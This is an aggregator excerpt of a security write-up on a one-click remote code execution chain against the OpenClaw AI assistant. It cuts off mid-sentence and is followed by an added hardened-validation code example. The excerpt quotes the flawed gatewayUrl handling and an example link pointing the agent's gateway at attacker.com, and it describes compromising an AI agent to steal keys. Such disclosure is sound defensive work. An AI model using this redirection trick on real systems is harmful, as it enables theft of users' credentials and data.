1-Click RCE to steal your Moltbot data and keys

https://news.ycombinator.com/rss Hits: 3
Summary

Hacking the Hottest Agent in Tech

OpenClaw (formerly Moltbot and ClawdBot), the open-source AI personal assistant that can take actions on your behalf, is the most popular topic on X right now. It is already trusted by over 100,000 developers to hold the keys to their digital life, from iMessage/WhatsApp/Slack access to unrestricted local computer control. But when you grant an agent "god mode" permissions, the margin for error vanishes. While the community celebrated its capabilities, depthfirst General Security Intelligence silently audited its code and found a critical vulnerability. I investigated the finding, combined it with a vulnerability I discovered, and chained them into a 1-Click Remote Code Execution (RCE) exploit. With this exploit, a single visit to a malicious webpage was enough to hack your computer and AI assistant.

I’ll dissect the logic flaw depthfirst uncovered and walk you through the exact kill chain I built to weaponize it.

How depthfirst Flagged the Vulnerability

Codebases are rarely linear; logic is scattered, fragmented, and buried across dozens of files. That’s where the complexity and bugs hide.

Our system maps the full flow of an application's lifecycle. Here, our engine stitched together a data flow across the stack to reveal a critical logic gap:

1. Ingestion: app-settings.ts blindly accepts a gatewayUrl query parameter in the URL and persists it to storage. For example, https://localhost?gatewayUrl=attacker.com would save attacker.com as the new gateway url.

    const gatewayUrlRaw = params.get("gatewayUrl");
    ...
    if (gatewayUrlRaw != null) {
      const gatewayUrl = gatewayUrlRaw.trim();
      if (gatewayUrl && gatewayUrl !== host.settings.gatewayUrl) {
        applySettings(host, { ...host.settings, gatewayUrl }); // persisted via saveSettings -> localStorage
      }
    }

2. Processing: app-lifecycle.ts triggers connectGateway() immediately after settings (such as the gateway url) are applied.

    handleConnected(host) {
      ...
      connectGateway(host); // runs immediately on load a...
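
A hardened take on the ingestion step described above, as an added example in plain JavaScript; it is not OpenClaw's code or its actual fix. Assumptions: gateways are reached over ws:// or wss://, and the `trustedHosts` allowlist, the `settings` object and the `confirm` callback are hypothetical stand-ins for the app's own state and UI.

```javascript
// Added example, not OpenClaw code. Assumption: gateways are reached over ws:// or wss://.
const ALLOWED_SCHEMES = new Set(["ws:", "wss:"]);

// Parse a candidate gateway URL and check it against an explicit host allowlist.
function checkGatewayUrl(raw, trustedHosts) {
  let url;
  try {
    url = new URL(String(raw).trim());
  } catch {
    return { ok: false, reason: "not an absolute URL" };
  }
  if (!ALLOWED_SCHEMES.has(url.protocol)) return { ok: false, reason: "scheme not allowed" };
  if (url.username || url.password) return { ok: false, reason: "embedded credentials" };
  // Compare the parsed hostname, never a substring or prefix of the raw string.
  if (!trustedHosts.has(url.hostname)) return { ok: false, reason: "host not trusted" };
  return { ok: true, url: url.href };
}

// Handle ?gatewayUrl=... so that a link alone can never change where the client connects.
// `settings` and `confirm` are hypothetical: the current settings object and a UI prompt
// that returns true only when the user explicitly approves the new gateway.
function ingestGatewayParam(search, settings, trustedHosts, confirm) {
  const raw = new URLSearchParams(search).get("gatewayUrl");
  if (raw == null || raw.trim() === "") return { settings, changed: false, reason: "no parameter" };
  const res = checkGatewayUrl(raw, trustedHosts);
  if (!res.ok) return { settings, changed: false, reason: res.reason };
  if (res.url === settings.gatewayUrl) return { settings, changed: false, reason: "unchanged" };
  // Even an allowlisted host needs an explicit user decision before it is persisted.
  if (!confirm(res.url)) return { settings, changed: false, reason: "user declined" };
  return { settings: { ...settings, gatewayUrl: res.url }, changed: true, reason: "confirmed" };
}
```

The caller persists the returned settings and reconnects only when `changed` is true, so a rejected or unconfirmed parameter never reaches storage or the connection step.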

First seen: 2026-02-01 21:30

Last seen: 2026-02-01 23:31